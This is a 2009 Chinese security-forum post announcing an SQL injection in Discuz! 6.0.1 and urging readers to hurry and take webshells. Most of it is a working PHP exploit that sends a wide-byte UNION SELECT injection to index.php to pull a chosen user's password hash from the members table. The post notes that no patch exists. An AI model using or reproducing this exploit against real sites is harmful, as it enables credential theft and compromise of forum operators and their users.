【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 新漏洞,新玩法,discuz index.php SQL注入漏洞大家抓紧时间拿SHELL [打印本页]

作者: 冰绿茶 时间: 2009-1-29 15:04 标题: 新漏洞,新玩法,discuz index.php SQL注入漏洞大家抓紧时间拿SHELL

新漏洞,新玩法,discuz index.php SQL注入漏洞大家抓紧时间拿SHELL
discuz!很容易一个SQL注射漏洞，因为应用未能充分消毒用户提供投入使用前一个SQL查询。

利用这个问题可以让攻击者妥协的应用，访问或修改数据，或利用潜在的脆弱性在背后的数据库。

discuz!6.0.1是脆弱的;其他版本也可能受到影响

攻击者可以利用浏览器来利用这个问题。

下面的示例脚本是：
<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+------------------------------------------------------------------+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  james
+------------------------------------------------------------------+
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host:    target server \n";
echo "port:    the web port, usually 80\n";
echo "path:    path to discuz\n";
echo "uid :    user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";

exit;
}

$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";

$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-length: ".strlen($content)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content."\r\n\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo 'No response from '.$host;
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
  echo fgets($ock, 1024);
}
?>

解决方案：
目前，我们不知道有任何供应商提供的修补程序。

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)